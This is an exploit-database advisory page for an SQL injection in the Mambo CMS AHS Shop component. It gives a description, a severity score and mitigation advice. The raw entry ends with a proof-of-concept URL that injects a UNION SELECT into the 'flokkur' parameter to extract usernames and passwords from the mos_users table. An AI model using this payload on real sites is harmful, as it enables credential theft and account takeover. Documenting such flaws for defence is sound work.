header-logo
Suggest Exploit
vendor:
AHS Shop
by:
Unknown
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: AHS Shop
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:mambo_cms_ahs_shop
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Mambo CMS AHS Shop SQL Injection Vulnerability

The Mambo CMS AHS Shop component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Sanitize user-supplied data to prevent SQL injection attacks. Use parameterized queries or prepared statements to ensure proper data sanitization.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/49419/info

The Mambo CMS AHS Shop component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/[PATH]/index.php?option=com_ahsshop&flokkur=-294 union select 0,username,password,3,4,5,6,7,8,9 from mos_users